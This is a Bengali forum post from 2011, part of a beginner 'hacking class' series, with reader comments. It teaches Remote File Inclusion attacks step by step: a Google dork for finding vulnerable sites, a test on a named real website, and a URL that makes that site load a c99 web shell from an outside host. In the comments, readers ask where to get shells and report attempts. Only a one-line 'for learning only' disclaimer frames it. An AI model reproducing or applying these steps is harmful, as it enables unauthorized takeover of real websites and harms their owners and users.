জনপ্রিয় বিভাগ 
সাধারণ বিভাগ 
অন্যান্য বিভাগ
আবারও হ্যাকিং করুন ওয়েব সাইট!!! এবারেরটা কতক্ষণ? ১০ মিনিটও লাগবে না | পর্ব- ৪ 
লিখেছেন, অনির্বাচিত টিউনার™
বিভাগ, হ্যাকিং, হ্যাকিং / ক্রেকিং ও এন্টি হ্যাকিং
তারিখ, ১৫ অক্টোবর ২০১১
৫৩ টি মন্তব্য
প্রিয় টিউন প্রতি ক্লিকে নতুন কিছু যাদুর বাক্সে
প্রিয় টিউন প্রতি ক্লিকে নতুন কিছু যাদুর বাক্সে
আসসালামু আলাইকুম, সবাইকে আবারও স্বাগতম আজকের হ্যাকিং ক্লাসে। কেমন আছেন সবাই? আশা করি সবাই মহান আল্লাহ তায়ালার অশেষ রহমতে পরিবার-পরিজন, আত্মীয়-স্বজন ও পাড়া-প্রতিবেশিদের নিয়ে খুবই ভাল আছেন। ভাল থাকেন ও ভাল রাখেন আপনার পাশের মানুষটিকে। কেউ খারাপ থাকলেই আমাকে বলবেন [যদিও আমি ফানের লোক না 
]।
গত কিছু দিন যাবত আপনাদের সাথে আমি হ্যাকিংয়ের বিভিন্ন টিউটোরিয়াল শেয়ার করছি। কেমন হচ্ছে? ভাল লাগলে তো কথাই নেই। সমস্যা হলে বলবেন। আর যেহেতু টিউনারপেজে হ্যাকিং ক্লাস শুরু হতে একটু দেরি হচ্ছে তাই আপনারা মনে করুন এটা হল হ্যাকিং ক্লাসের কিছু অংশ বিশেষ 
। যাক আবারও দেখাব কিভাবে একটি ওয়েবসাইট কে কাত করে ফেলে ভেঙ্গে দিতে হয়। গত পর্বেরটা অনেকেই বলেছেন যে পেরেছেন। মজার বিষয় হল ওটা ছিল একদম সহজ ও মোটামুটি কার্যকর পদ্ধতিগুলোর মধ্যে একটি। কেমন শিখছেন হ্যাকিং? জানাবেন অবশ্যই।
হ্যাকিং নিয়ে ধারাবাহিক পর্বগুলো দেখেনঃ
- !i!i XSS এর একটি সম্পূর্ণ বাংলা হ্যাকিং টিউটোরিয়াল !i!i পর্ব- ১
- i!i!i!i! কিভাবে RapidShare ক্র্যাক করবেন i!i!i!i! পর্ব- ২
- মাত্র ৫ মিনিটে একটি ওয়েবসাইট হ্যাকিং করুন (মেগা পোষ্ট) পর্ব- ৩
- আবারও হ্যাকিং করুন ওয়েব সাইট!!! এবারেরটা কতক্ষণ? ১০ মিনিটও লাগবে না | পর্ব- ৪
- XSS এর সম্পূর্ণ টিউটোরিয়াল (নতুনদের জন্য) পর্ব- ৫
- …::: LFI হ্যাকিংয়ের সম্পূর্ণ বাংলা টিউটোরিয়াল :::… পর্ব- ৬
- IIS Exploit সম্পূর্ণ বাংলা হ্যাকিং টিউটোরিয়াল (উইন্ডোজ ৭) | পর্ব-৭
- ®¤Θ RTE হ্যাকিং টিউটোরিয়াল, হ্যাকিং করতে মাত্র কয়েকমিনিট সময় নেন ®¤Θ | পর্ব-৮
আজ দেখাব Remote file inclusion হ্যাকিং। ওহ! আপনারা হয়ত জানেন না যে, হ্যাকিং করার থেকে হ্যাকিং নিয়ে পোষ্ট লেখা আরও কঠিন ও কষ্টকর। যদি পোষ্ট করতেন তাহলে বুঝতেন। থাক পোষ্ট করা লাগবে না, শুধু মন্তব্য করলেই হবে। মন্তব্য করলে পোষ্টের টিজেরা উৎসাহিত হয়। এতে তাদের লেখার গতি ও স্বাচন্দ্যও বাড়ে। তাহলে আর কথা নয় এবার শুরু হয়ে যাক পোষ্টটি…..
Remote file inclusion হ্যাকিং, একে সংক্ষেপে বলে RFI হ্যাকিং। এটি অনন্যা হ্যাকিং ম্যাথডের মধ্যে এটিও একটি অন্যতম জনপ্রিয় ম্যাথড। অন্যন্যা পদ্ধতির মতো এই পদ্ধতিতেও আপনাকে ওয়েবসাইটের vulnerability বের করতে হবে। এই vulnerability এর মাধ্যমে একজন হ্যাকার একটি ওয়েব সার্ভারের remote file যুক্ত করতে পারে। আশা করি RFI হ্যাকিং সম্পর্কে মোটামুটি ধারণা পেয়েছেন।
——————————————————————————————————————————————————
কোন সাইটটি vulnerable ? কিভাবে বুঝবেন? খুবই কঠিন প্রশ্ন, তাই না? এই প্রশ্নের উত্তর জানার জন্য নিচের লিংকটি দেখেন….
http://www.targetsite.com/index.php?page=Anything
উপরের লিংকের মতোই দেখতে পাবেন, যেগুলো আপনি খুঁজচ্ছেন তন্ন তন্ন করে। এখন এগুলো বাহির করবেন কিভাবে? গুগল ডক দরকার ? নিন নিচে গুগল ডক দিলাম।
“inurl:index.php?page=”
উপরের ডকটি গুগলে নিয়ে সার্চ দিন। তাহলে আপনাকে “index.php?page=” এই টাইপের যত ওয়েবসাইট আছে, সবগুলো ওয়েবসাইট গুগল আপনার সামনে এনে হাজির করবে। এখন কোন ওয়েবসাইটটি আজকের ম্যাথডের জন্য vulnerable তা পরীক্ষা করে দেখতে হবে। কিভাবে করবেন ? নিচের মতো করে করুন।
http://www.targetsite.com/index.php?page=www.google.com
এখন মনে করেন আমি আমি http://www.cbspk.com/ এই সাইটটি খুঁজে পেয়েছি। এখন আমরা চাইব এটা vulnerable কি না। তাহলে লিখুন….
http://www.cbspk.com/v2/index.php?page=http://www.tunerpage.com
তাহলে এটি দেখাবে…
এখন যদি উক্ত ওয়েবসাইটটি অন্য ওয়েবসাইট নিয়ে খোলে তাহলে বুঝবেন যে এই ওয়েব সাইটে RFI ইঞ্জেকশান দেয়া যাবে। এবার আসুন পরের ধাপে…
এরপর সাধারণত হ্যাকাররা তার ভিকটিমের ওয়েবসাইটে যে কোন Shells আপলোড করে, যাতে তার কাজটি সবাইকে দেখাতে । মানে প্রমাণটি। বেশিরভাগ হ্যাকাররা c99 shell বা r57 shell আপলোড করে। আমি আপনাদের দেখাব c99 shell আপলোড করা। এজন্য হ্যাকাররা যে কোন একটি ওয়েবহোষ্টটিং সাইটে তাদের সেল আপলোড করে নেয়। যেমন- ripway.com, 110mb.com ইত্যাদি। এখন মনে করেন আমি ripway.com এই সাইটে সেল আপলোড করলাম। তাহলে আমার লিংক হবে…
http://h1.ripway.com/tjunselected/c99shell.php?
এবার হ্যাকার ওয়েবসাইটটিতে একটি কমান্ড দিবে। কমান্ডটি হবে
http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/tjunselected/c99shell.php?
এখন তাহলে এটি ওয়েবসাইট দেখব। দেখেন, কি দেখেন ?
তবে অবশ্যই মনে রাখবেন লিংকের শেষে “ ? ” প্রশ্নবোধক চিহ্নটি লাগিয়ে দিবেন। নতুবা আপনার শেল কাজ করবে না।
এই পোষ্টটি শুধু মাত্র শিখার উদ্দেশ্য। কারও ক্ষতি করার উদ্দেশ্যে করা হয় নি। তাই এই পোষ্টে অপব্যবহার কেউ করবেন না। অপব্যবহার করার ফলে কারও ক্ষতি হলে টিজে দায়ী নয়।
ব্যস কাজ শেষ। এবার নাকে তেল দিয়ে ঘুমিয়ে পড়ুন। সবাই ভাল থাকুন ও ভাল রাখুন পাশের মানুষটিকে। আল্লাহ হাফেজ……
পোষ্টটি লিখেছেন টিজে - অনির্বাচিত টিউনার™
এটা “অনির্বাচিত টিউনার” এর ৪৩৫ নং পোষ্ট। আর এই পোষ্টের মাধ্যমে টিজে “অনির্বাচিত টিউনার” ও টিজে পুদিনা পাতার পোষ্ট সমান সংখ্যক হল। আমার আসলে পিপি ভাইকে ক্রস করে যাওয়ায় আমি অত্যান্ত দুঃখিত।
ভাই এখন তো সবাই হ্যাকার হয়ে যাবে, তখন এদের হাত থেকে বাচব কিভাবে এইটা নিয়ে একটা পোস্ট দিলে ভাল হয়। বিশেষ করে ওয়েব ডিজাইনার দের জন্য।
হা হা হা হা হা হা হা । আসলে এটা থেকে বাঁচার পথ হল আপনার ওয়েবসাইটে যে সকল বাগ আছে সবগুলো ঠিক করা। তাহলে আর আপনার সাইটের কিছুই করতে পারবে না। যাক, চেষ্টা করব একটা পোষ্ট করে বুঝিয়ে দিতে।
আপনাকেও অনেক ধন্যবাদ
অভিনন্দন পুদিনাপাতা, অনির্বাচিত টিউনার। অভিনন্দন ভাগ করে নিন।
আমি ৪০% নিলাম। পুদিনাপাতা ভাই ৬০% নিন।
আপনাকে আমাদের পক্ষ থেকে ১০০% অভিনন্দন
আমি একাই ১০০% ইভিনন্দন নিয়া নিলাম
থুক্কু অভিনন্দন*
সহমত
ঠি ক আ ছে ঠি ক আ ছে
দারুন হিসাব . হা হা হা
পোস্ট তা দারুন হইছে .ধন্যবাদ .
এই হিসাব আমার পছন্দ হয় নাইB-)B-)
কিছুটা স্বজনপ্রীতি হইল নাh?
আমি এটাই খুঁজছিলাম গত কয়েক সপ্তাহ ধরে। কিন্তু অন্যান্য ইংরেজি ব্লগসমূহে আপনার মত এত সুন্দর এবং সাবলীলভাবে লিখতে পারেন নি।
আপনাকে অসংখ্য ধন্যবাদ Remote File Inclusion নিয়ে লেখার জন্য।
আপনাকে এবং পুদিনা পাতা ভাইকে অভিনন্দন জানাই।
আপনাকেও অনেক ধন্যবাদ। এটা থেকে গত কালেরটা আরও সহজ ছিল মনে হয়। আর আমি ভাল করে লিখতে পারি না। তে আপনার লেখা অনেক চমৎকার হয়েছে। আশা করি আমাদের আরও এমন সুন্দর সুন্দর লেখা উপহার দিবেন।
ভাইয়া ,সেল গুলি পাব কোথায়??????
অনির্বাচিত টিউনার ভাই c99 & r57 সেল গুলো পাবো কোথায়?
নেটে সার্চ দেন পেয়ে যাবেন। তবে আশা করি সামনে c99 shell ও r57 সেল নিয়ে একটা পোষ্ট করব। দেখি সময় পেলেই করে ফেলব। আপনাকে ধন্যবাদ
হুম তাইলে অপেক্ষায় রইলাম
কি যে শুরু করলেন ভাই, এত চরম চরম পোস্ট দেন কেমনে????????????????
কই চরম ? আপনার পোষ্টগুলো আমার কাছে খুবই চরম থেকে চরমতর লাগে।
আপনাকে ধন্যবাদ
সোজা প্রিয়তে নিলাম।
প্রিয়তে নিলেন নাকি প্রিয় তে পাচার করে দিলেন?
দুটোই করলাম। হি হি হি হি হি হি
অনি ভাই একটা কথা বলি; (বিশেষ দ্রষ্টব্যঃ মাইন্ড কইরেন না)
) 
আগের প্রসেসের জন্য ভালনারেবল সাইট খুঁজতে আমার অবস্থা কাহিল হয়ে গিয়েছিল। তবে এই প্রসেসের ভালনারেবল সাইট পাওয়া অনে-এ-এ-এ-এ-ক সহজ (আর যদি থাকে আপনার চরম টিউন
ধন্যবাদ।
বক বক করে আসল কথাটাই বলা হল না।
সোজা প্রিয়তে………
ভাই এই ইমো গুলা কিভাবে দিলেন ?
http://www.tunerpage.com/wp-includes/images/smilies/icon_redface. gif
http://www.tunerpage.com/wp-includes/images/smilies/icon_arrow. gif
আসলে এটাতে আমার কোন কৃতিত্বই নেই। সব কিছুর কৃতিত্ব আপনাদের সবার। আর যেটা যত বেশি সহজ সেটা খুঁজে বের করা আরও বেশি কঠিন। কি বলেন ?
আপনাকে আবারও ধন্যবাদ। আর আমি কখনও কারও উপর রাগ করি না
কেউ খারাপ থাকলেই আমাকে বলবেন [যদিও আমি ফানের লোক না
]।
আমি খারাপ আছি, ইন্টারনেট এর স্পীড অনেক সমস্যা করতেছে, ব্যবস্থা নেন !
ঠিক আছে আমার সর্বনিম্ন স্পীডের মডেমটা আপনার ঠিকানায় পাঠাইতেছি। এটা দিয়ে আপনি ৫০০ মেগা/সে. ডাউনলোড করতে পারবেন
এতো load রাসেল ১৩ নিতে পারবে??????
অনির্বাচিত টিউনার ভাই খুব সুন্দর হয়েছে ।
। কিন্তু http://www.targetsite.com/index.php?page=Anything এবং http://www.targetsite.com/index.php?page=www.google.com লিঙ্ক দুটি কিভাবে এবং কোথায় ব্যবহার করব ? বুঝতে পারছি না ।
রিয়ন ভাই আপনি আবার ধীরে পড়ুন পোষ্টটা। আপনি চিত্র ৩টার মধ্যে ২য়টা একটু কষ্ট করে দেখুন আর উপরে লেখাগুলো পড়ুন।
মনে করি আপনি এই সাইটটির ভ্যালু খুঁজে পেয়েছেন। http://www.cbspk.com/v2/index.php
এখন দেখবেন যে এটাতে উক্ত ইঞ্জেকশানটি কাজ করবে কি না। এজন্য উক্ত সাইটের লিংকের পরে আরেকটা সাইটের লিংক বসিয়ে দেন। যেমনঃ http://www.cbspk.com/v2/index.php?page=http://www.tunerpage.com তাহলে যদি দেখেন ২য় ছবিটার মতো হয়েছে, তাহলে বুঝবেন যে এটাতে উক্ত ইঞ্জেকশান কাজ করবে। তারপর পোষ্টে
ধন্যবাদ, সমস্যা হলে বলবেন।
ভাই কমেন্ট করতে late হয়ে গেল ….great পোস্ট …..ধন্যবাদ >>
আপনাকে তো এখন আর দেখাই যায় না। কই আপনি? আগে আপনাকে মন্তব্যের প্রথমে পেতাম এখন আপনি নাই। আপনাকেও ধন্যবাদ
ভাই আমি একটু busy আছি ……কিন্তু আপনাদের সাথে আছি .. ধন্যবাদ
সালাম । আপনার পোস্ট টি খুব চমৎকার হয়েছে ।শুভ কামনা রইল ।
___________________________________________________________________________
___________________________________________________________________________
একটি সাহায্য চাই আপনার থেকে এবং সকল টিজে দের থেকে , সমস্যা টি হল ফেসবুকে অনেকেই তার লগইন ইমেইল
ঠিকানা টি লুকিয়ে রাখে । এই লুকিয়ে রাখা ইমেইল ঠিকানা টি কি করে পেতে পারি টা জানাবেন দয়াকরে ।
আপনি কি বুঝাতে চেয়েছেন যে, আপনি আপনার বন্ধুর লগইন করা ইমেইল এড্রেসটি কিভাবে দেখবেন?
যদি এটা হল, তাহলে আপনার বন্ধ যতক্ষণ পর্যন্ত না আপনাকে দেখাবে, ততক্ষণ পর্যন্ত আপনি ইমেইলটি দেখতে পারবেন না।
আপনাকে ধন্যবাদ
c99sell টা আপলোড করার পর লিঙ্ক পাছি না ভাইয়া । আমি x90x.net তে আপলোড করেছি। একটু সাহায্য করেন…
ভাল করে চেক করে দেখুন। সমস্যা কোথায় করেছেন। ধন্যবাদ
জোস হইছে ভাই
আপনাকে ধন্যবাদ
ভাই সবকিছু ঠিক আছে কিন্তু vulnerability বের করতে পারতেছি না। প্লিজ হেল্প করেন………
যেভাবে দেখিয়েছি ঐভাবে আবার চেষ্টা করুন, আশা করি সফল হবেন। ধন্যবাদ
দারুন!!!!!!!!!!!!!!! (যদি পারি) হি হি
চেষ্টা করে দেখুন, পারেন কিনা
অনেক ধন্যবাদ
পারতেছি না ।
হচ্ছেনা ভাই
অনেক ভালো লেগেছে।
অনেক সুন্দর পোস্ত।
ভালনারেবল সাইট নাই
asolai ভালনারেবল সাইট নাই